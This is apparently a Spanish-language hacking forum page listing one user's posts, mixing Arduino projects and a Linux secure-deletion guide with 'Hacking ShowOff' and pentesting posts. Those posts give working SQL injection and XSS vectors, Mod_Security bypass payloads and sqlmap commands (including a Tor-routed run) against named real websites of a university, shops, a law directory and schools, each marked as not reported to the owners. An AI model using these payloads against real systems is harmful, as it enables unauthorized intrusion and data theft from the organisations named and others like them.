Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - rreedd

Páginas 1 2
#41
Hacking ShowOff / [SQLi] http://www.cerir.com.ar
Marzo 12, 2016, 06:21:23 PM

Sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción : Pagina de estudios políticos y relaciones exteriores de la Universidad de Rosario (Argentina)



  • [SQLi] Inyección en URL
         
        Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Vector:  -1/*!50000UNION*//*!50000SELECT*/1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3--+
        xploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Reportado: NO
        Autor: RREEDD


Cualquier duda o consulta no dudes en comentar
Saludos desde Chile
#42
Hacking ShowOff / [SQLi] https://impulso.com.pe
Marzo 11, 2016, 08:30:58 PM
Sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción Del Sitio : Venta de artículos electrónicos en Perú.

Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba ;D.


  • [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
       

        Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

       Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50

        xploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

        Reportado: NO

        Autor: RREEDD

Cualquier duda o sugerencia por favor no dudes en comentar.

Saludos desde Chile
#43
Arduino - Raspberry PI / Smartphone como monitor Serial de Arduino
Marzo 10, 2016, 12:38:05 AM
RREEDD
Hola!!!

Compañeros, hoy les explicare como usar el celular como monitor Serial de Arduino y así no tendremos que conectarlo al PC para saber que es lo que esta pasando en las entrañas de nuestra placa  ;D.

Para lograr la conexión necesitamos los siguiente.

  • Que nuestro teléfono sea compatible con "USB On-The-Go", lo que según Wikipedia seria:

    CitarUSB On-The-Gonota 1 conocido también por el acrónimo USB OTG y como USB hostnota 2 es una extensión de la norma USB 2.0 que permite a los dispositivos USB tener mayor flexibilidad en la gestión de la interconexión.

    Permite que ciertos dispositivos, por ejemplo: reproductor de audio digital o teléfono móvil, actúen como host, por lo que se les puede conectar una memoria USB, un ratón, un teclado, un disco duro, un módem, etc.
    Para mas información.
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


  • Tener un cable de USB a MicroUSB (depende de la entrada de tu terminal)

  • Descargar esta aplicación para Crear la conexión Serial desde el Smartphone a Arduino

    LINK : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
       



EJEMPLO

Primero Con Un LCD para ver la comunicación serial en tiempo real
Código: text
// Importa las librerias

#include <Wire.h>                 
#include <LiquidCrystal_I2C.h>    // Libreria que controla la pantalla LCD
LiquidCrystal_I2C lcd(0x27, 2, 1, 0, 4, 5, 6, 7, 3, POSITIVE);  // Inicializa el LCD
int cont;  // contador que enviaremos con Serial

/*
 Para descargar la libreria  LiquidCrystal_I2C.h.

https://bitbucket.org/fmalpartida/new-liquidcrystal/downloads/LiquidCrystal_V1.2.1.zip

             
                    _________________
                    |d13         D12| 
                    |3v3         D11| 
                    |REF         D10|     
                    |A0   Arduino D9|
                    |A1    NANO   D8|
                    |A2           D7|
                    |A3           D6|
         SDA (lcd)  |A4           D5| 
         SCL (lcd)  |A5           D4| 
                    |A6           D3| 
                    |A7           D2| 
         VCC (lcd)  |5v          GND| 
                    |RST         RST|
         GND (lcd)  |GND          TR| 
                    |VIN          TX| 
                    |_______________|        
*/
void setup()   { 
  
lcd.begin(16,2);      // Se introduce el tamaño de nuestro LCD  
Serial.begin(9600);  // Establecemos la comunicacion Serial a 9600 baud 
cont =0;
}
void loop() {
  	
lcd.clear();          			     	 	       // Limpia la pantalla
lcd.setCursor(0,0);    						      // Establece la ubicacion
lcd.print("underc0de"); 		   			     // mensaje
lcd.setCursor(0,1);         	   			    // Establece la ubicacion
lcd.print("Contador");     		   			   // mensaje
lcd.setCursor(12,1);       		  			  // Establece la ubicacion
lcd.print(cont);           		  			 // mensaje
delay (1000);           		  			// establece una espera en el codigo
String mensaje="underc0de Contador: ";     // establece el mensaje
Serial.print(mensaje);                    // mensaje por Serial
Serial.println(cont);                    // mensaje por Serial
cont = cont + 1 ;

 }





Ahora veremos la comunicación Serial sin el LCD

Código: text
int cont;  // contador que enviaremos con Serial

void setup()   { 
Serial.begin(9600);  // Establecemos la comunicacion Serial a 9600 baud 
cont =0;
}
void loop() {
  	

delay (1000);           		  			// establece una espera en el codigo
String mensaje="underc0de Contador: ";     // establece el mensaje
Serial.print(mensaje);                    // mensaje por Serial
Serial.println(cont);                    // mensaje por Serial
cont = cont + 1 ;

 }




Espero que les sirva y para sus proyectos y cualquier duda por favor comenten.
Saludos desde Chile.
#44
Pentesting / Evadir Mod_Security con Tampers de SQLMAP
Marzo 06, 2016, 05:00:43 PM
RREEDD
Hola !!
como a todos nos habrá pasado alguna vez que intentas hacer una inyección por GET en una pagina y aparece
aparece el famoso anuncio de Mod_Security que no deja inyectar.



Pero si creíste que con eso se acababa el juego estas muy equivocado, siempre estará SQLMAP al rescate con sus 47 Tampers (que son los que vienen por defecto en la ultima versión ) los cuales te sacaran de mas de un apuro   ;).

Para este ejemplo usaremos "modsecurityversioned.py" (el cual solo funciona con MySQL).

Si quieres mas información sobre cada uno tienes que ir a sqlmap/tamper/,   donde encontraras todos los disponibles y dentro de cada archivo existe una explicación de su funcionalidad

Para usar un Tamper en SQLMAP es muy simple solo se le debe agregar la opción
Código: text
 --tamper [nombre del tamper]


El ejemplo de inyección lo haremos con una pagina Peruana de venta de artículos electrónicos (espero no les moleste) ;D .

URL :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Herramienta : SQLMAP  Tamper : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xploit :
Código: text
sqlmap.py -u "https://impulso.com.pe/detalle_marca.php?marca_id=24&cat_id=5" --dbms "MySQL"  -p "marca_id" --tamper "modsecurityzeroversioned.py" --batch


RESULTADO

REPORTADO : NO


Saludos desde Chile
#45
Hacking ShowOff / [XSS, SQLi] www.abogadosrosarinos.com
Marzo 06, 2016, 01:54:13 PM
RREEDD
Sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descripción del sitio : Pagina para contratar Abogados en Argentina

Hola!!!

Espero les guste y cualquier reparo o consulta por favor no dudes en postear


Saludos desde Chile
#46
Arduino - Raspberry PI / Les Presento Mi Auto Controlado Por Bluetooth
Marzo 06, 2016, 12:14:35 AM
RREEDD
Hola !!!

Les presento mi auto basado en Arduino y que se controla por bluetooth.



El armazón esta hecho de cartón piedra, cuenta con:1 Arduino nano, 1 puente H, 4 reductores de velocidad, 2 servo y una placa que regula el voltaje para alimentar los servos por que consumen mucha corriente de mis baterías de 9v


La pinza la hice yo solo con cartón y silicona


Como control utilizo una aplicación que se llama Arduino BT Joistick
Aqui LINK de descarga
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El código fuente de mi auto lo dejo a continuación por si es que les sirve, para sus proyectos o de referencia.
Lo intente comentar lo mas que puede pero si es que surge cualquier duda solo díganme

Código: text


// incluimos la biblioteca Servo 

#include <SoftwareSerial.h>
#include <Servo.h>   

// Se crean los objetos Servo
Servo servoAngulo;       
Servo servoPinza; 
 

int comando = 0; // variable a la cual de daremos el valor de la que venga por la comunicacion serial

//pines de entrada de motores
int Motor4 = 5;
int Motor3 = 4;
int Motor2 = 3;
int Motor1 = 2;

//angulos de controlpara el servo
int angulo =90;
int anguloPinza =30;
/*

Los pines GND y VCC del Servo no aparecen porque use un regulador de tencion para que no me consumiera toda la bateria 


             
                    _________________
                    |d13         D12| Servo
                    |3v3         D11| Servo
                    |REF         D10|     
                    |A0   Arduino D9|
                    |A1    NANO   D8|
                    |A2           D7|
                    |A3           D6|
                    |A4           D5| Motor3
                    |A5           D4| Motor4
                    |A6           D3| Motor2
                    |A7           D2| Motor1
     VCC bluetooth  |5v          GND| gnd bluetooth, gnd PuenteH(para igualar tierra)
                    |RST         RST|
     - 9v, - PunteH |GND          TR| tr bluetooh
     + 9v, + PunteH |VIN          TX| tx bluetooh
                    |_______________|        

*/

void setup() {

//inicializar servos
servoAngulo.attach(12); 
servoPinza.attach(11); 

//se declaran como OUTPUT los pines para controlar los motores junto al puente H
pinMode (Motor3, OUTPUT); 
pinMode (Motor4, OUTPUT); 
pinMode (Motor2, OUTPUT);
pinMode (Motor1, OUTPUT);

 // Se declara la recepcion Serial a 9600 baud
Serial.begin(9600);
}
 
void loop() {
//si viene algo por Serial se continua
if(Serial.available() > 0){
//el contenido de Serial se guarda en comando
comando = Serial.read();
}


   if (comando == '1') {
        digitalWrite (Motor3, HIGH);
        digitalWrite (Motor4, LOW);
        digitalWrite (Motor2, HIGH);
        digitalWrite (Motor1, LOW);
        Serial.println("Derecha");
        delay(20);
   }
   else if (comando == '0') {
        digitalWrite (Motor3, LOW);
        digitalWrite (Motor4, HIGH);
        digitalWrite (Motor1, HIGH);
        digitalWrite (Motor2, LOW);
        Serial.println("izquierda");
        delay(20);
   }
   else if (comando == '3') {
        digitalWrite (Motor3, HIGH);
        digitalWrite (Motor4, LOW);
        digitalWrite (Motor1, HIGH);
        digitalWrite (Motor2, LOW);
        Serial.println("Abajo");
        delay(20);
   }
   else if (comando == '4') {
        digitalWrite (Motor4, HIGH);
        digitalWrite (Motor3, LOW);
        digitalWrite (Motor2, HIGH);
        digitalWrite (Motor1, LOW);
        Serial.println("Arriba");
        delay(20);
   }
   else if (comando == '5') {
   //servo arriba
         angulo = angulo + 5;
        Serial.println(angulo);
        servoAngulo.write(angulo);               
        delay(15);                        
        angulo =constrain(angulo,0,180);
        Serial.println("angulo arriba");
   }
   else if (comando == '6') {
       angulo = angulo - 5;
        Serial.println(angulo);
        servoAngulo.write(angulo);               
        delay(15); 
        angulo =constrain(angulo,0,180);
        Serial.println("angulo abajo");


   }
   else if (comando == '8') {
        anguloPinza = anguloPinza + 5;
        Serial.println(anguloPinza);
        servoPinza.write(anguloPinza);               
        delay(15);                                  
        anguloPinza =constrain(anguloPinza,0,180);
   Serial.println("pinza cierra");
   }
   else if (comando == '9') {
       anguloPinza = anguloPinza - 5;
       Serial.println(anguloPinza);
       servoPinza.write(anguloPinza);               
       delay(15);                                  
       anguloPinza =constrain(anguloPinza,0,180);
       Serial.println("pinza abre");

   }else{
        // se ponen todos los valores en LOW para detener la detener los motores hasta que llege una nueva orden
        digitalWrite (Motor3, LOW); 
        digitalWrite (Motor4, LOW); 
        digitalWrite (Motor2, LOW); 
        digitalWrite (Motor1, LOW); 
   }
}
   



Saludos Desde Chile
#47
Hacking ShowOff / [SQLi , XSS] www.fepal.net
Marzo 05, 2016, 09:37:52 PM
Hola !!!
Bienvenido a mi post

RREEDD
Sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.

  • [XSS] Inyección en URL .
       
        Url del sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Vector : <h1>underc0de</h1>
        xploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD


  • [SQLi] Inyección en URL.
       
        Url del sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Inyeccion :  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u "www.fepal.net/noticias.php?id=1&pg=1" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
#48
Hacking ShowOff / [XSS, SQLi] www.ipchile.cl
Marzo 04, 2016, 07:24:51 PM
RREEDD
Hola a todos les presento mi primer post en hacking showOff.  ;D
Espero les guste.


Sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción Del Sitio: Instituto de educación técnico profesional Chileno.


Lista de Vulnerabilidades.



  • [SQLi] Inyección en login de pagos.

       
         
        Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
        Inyeccion : ' or 1=1 --
        Reportado: NO
        Autor: RREEDD
  • [XSS] Inyección en URL .

         

        Url del sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Vector : ><script>prompt("underc0de", " By  RREEDD");</script>
        xploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Reportado: NO
        Autor: RREEDD
  • [SQLi] Inyección en sector de consulta de certificados.

       
         
        Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
        Inyeccion : ' or 1=1 --
        Metodo : POST
        Reportado: NO
        Autor: RREEDD
  • [SQLi] Inyección en sector login.

       
        Adentro
       
         
        Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
        Inyeccion : ' or 1=1 --
        Reportado: NO
        Autor: RREEDD
Me gustaría si me pueden ayudar a reportarlo.
Saludos desde Chile.
#49
GNU/Linux / Wipe en ubuntu e integracion con el explorador Nautilus
Febrero 27, 2016, 08:02:19 PM
Hola en este post trataremos sobre como instalar wipe en ubuntu e integrarlo con nautilus para poder borrar archivos de forma segura y cómoda  ;D.

Instalar WIPE
Código: text
sudo apt-get install wipe


  Wipe les permitirá eliminar los archivos y sobrescribir el espacio que utilizaban en el disco, haciéndolos prácticamente irrecuperables para la mayoría de los programas forenses, pero si quieren estar 100% seguros de la eliminación definitiva del fichero, les recomiendo que le den muchos martillazos o prendan sobre el una bomba termita ;D jajajaajj.
   
    Wipe Comandos:

        -f (forzado desactivar la solicitud de confirmación)
           
        -r (recursividad en subdirectorios)
           
        -c (chmod si es necesario)
             Si un archivo o directorio a ser limpiadas no ha establecido permisos de escritura,
             llevará a cabo un chmod para establecer el permiso.

        -i (modo informativo, detallado)
           
        -s (modo silencioso)         

        -q (borrado rápido)
             Si se utiliza esta opción, limpie sólo hará (por defecto) 4 pases
             en cada archivo, escribiendo datos aleatorios. Consulte la opción -Q

        -Q [Número de pasos]
             Establece el número de pases para limpieza rápida. El valor predeterminado es 4.

        -a (abortar en caso de error)
             El programa se desactiva con EXIT_FAILURE si un error no fatal es
             encontrado.

        -v Mostrar información de la versión y salir.

        -h Muestra la ayuda.


Ejemplo de borrado seguro de un archivo.
   
Código: text
sudo wire -cri archivo



Integracion de Wipe con nautilus
para que al hacer clic derecho junto con el menú aparezca la opción de borrado con wipe.
   
Código: text
sudo apt-get install nautilus-wipe

(tuve que reiniciar el equipo para que el cambio en nautilus surtiera efecto pueden probar cerrando sesión o simplemente reinicien)




Espero les sirva  :).
Saludos desde Chile.
#50
Off Topic / Hola comparte tus experiencias
Noviembre 22, 2015, 12:48:47 PM
Hola es mi primer post.
Soy relativamente nuevo en la Seguridad informática pero es algo que me apasiona de verdad. Así que e pasado y jugado a cuanto WARZONE se me a cruzado jajajajaj.

Pero me gustaría  poder hacer que compartieran sus experiencias conmigo y con quienes lean este post , sobre como empezaron en este mundo , escuchar las recomendaciones de quieres ya recorrieron el camino y ver cuales fueron sus motivaciones.

:)
----Gracias Por Pasar A Mi Primer Post----
Páginas 1 2